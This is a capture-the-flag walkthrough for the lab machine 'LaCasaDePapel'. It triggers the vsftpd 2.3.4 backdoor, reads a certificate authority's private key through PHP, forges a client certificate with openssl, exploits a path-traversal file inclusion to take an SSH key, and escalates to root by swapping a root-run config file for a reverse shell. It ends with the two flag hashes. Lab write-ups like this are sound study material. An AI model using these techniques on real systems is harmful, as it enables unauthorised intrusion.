- nmapAuto
- vsftp 2.3.4 exploit
- initial foothold
- dl cert
- generate client key
- certificate sign request data
- convert to PKCS12
- add key to firefox certificate store
- add ca.crt to firefox
- refresh page
- Local file Inclusion Vuln
- ssh into professor acct
- user.txt
- privesc
- user/root
- lessons learned
LaCasaDePapel
nmapAuto
nmaprecon
nmap
recon
niktogobuster
nikto
httphttps
gobuster
no finds on the http servervsftp 2.3.4 exploit
doing a little googling, vsftpd 2.3.4 is infamousopen backdoor on port 6200 with :)
typing steve:) to trigger the backdoor
and nmap again:
port is open, lets connect
rlwrap nc to port 6200
we can use netcat to connect to our victim on port 6200rlwrap is a script that allows our shell to arrow up to past commands which is incredibly convenient in this scenario
phpinfo()
we see we're logged in as user dali
scandir
we can list the various folders of our victim by using the scan directory php command or scandirinteresting files
1. nairobi's ssh key2.
ls $tokyo
if we ‘ls’we see file_get_contents('/home/nairobi/ca.key')
and also the cert is in x509 format
using vi to clean up nairobi's key
1st to get rid of the ‘\n’s:%s/\\n/g
1. %s/ to initiate remove
2. \\n is to remove ‘\n’ character
3. /g is to finish
Next we need to remove the leading spaces, do that manually
nairobi's public key
we can get nairobi's public key with a simple openssl commandopenssl pkey -in <private key> -pubout
/etc/passwd
initial foothold
dl cert
first we export the certificate to our directory, I also renamed it ca.crtcompare public keys of nairobi's key and webserver's key
we can compare the webserver's key with nairobi's key that we extracted earlierand we generate our certificate's public key with the following (cert says its x509 on the form)
openssl x509 -in ca.crt -pubkey -noout
we have the private key to the certificate authority used to trust this webserver
(they are the same) what does this mean? -we have the private key to the certificate authority used to trust this webserver -→ so we can generate a client key->>>
generate client key
we have the private key to the certificate authority used to trust this webserverso we can generate a client key
openssl genrsa -out client.key 4096
now we have to create a certificate signing request:
openssl req -new -key client.key -out client.csr
now we have our certificate signing request, but now we have to sign it
openssl x509 -req -in client.csr -CA ca.crt -CAkey nairobi_ca_key -set_serial 9001 -extensions client -days 9002 -outform PEM -out client.cer
now we have a signed certificate, but unfortunately firefox cannot import it, it has to be in PKCS12
certificate sign request data
Here are my settings, feel free to input whatever you want, it makes no difference
country:US
State:OH
Locality:SC
ON:xiong
OU name:mao
CN:maoxiong
email:xiong@miaomao.now
pass:miao
convert to PKCS12
openssl pkcs12 -export -inkey client.key -in client.cer -out client.p12password=miao
p12 key is a combination of client.cer and client.key
info
to view our certificate info:openssl pkcs12 -info -in client.p12
add key to firefox certificate store
search for certification in firefox's settingsadd ca.crt to firefox
make sure the trust settings are set to identify websitesrefresh page
we see this animation move around a bit and...
we're in the private area
https://10.10.10.131/file/U0VBU09OLTEvMDEuYXZp
Local file Inclusion Vuln
LFI: we see the path variable can load other directories on our victim as well:https://10.10.10.131/?path=..
we've successfully navigated to another directory on the box, proving it has a local file inclusion vulnerability
.ssh
ssh into professor acct
using the rsa_id private key we downloaded, we can use trial and error to see which user owns this key and log into them via sshafter trying each user found earlier
we have our foothold!
user.txt
privesc
pspymemcache.ini
using professor's directory ownership to our advantage
pspy
lets monitor the processes on the box and see what we can find out1. first set up our httpserver in the same directory as our pspy script
2. download it to our victim
3. run it and check for interesting processes
./pspy64 -f
-f -> file system events
memcache.ini
we see memcache.ini is being called every few minuteschecking the file we see its owned by root and that we can only read the file
using professor's directory ownership to our advantage
Although we do not have permission to make changes to memcache.ini since root wrote it, professor DOES however, own his own /home/professor directorymeaning we can simply move/rename memcache.ini within our directory, allowing us to write our own memcache.ini that will be called in the schdeuled process we observed from pspy
finally, we replace the command variable with a reverse shell of our own
revshell
wait for the memcache.ini to run and voila!user/root
4dcbd172fc9c9ef2ff65c13448d9062d
586979c48efbef5909a23750cc07f511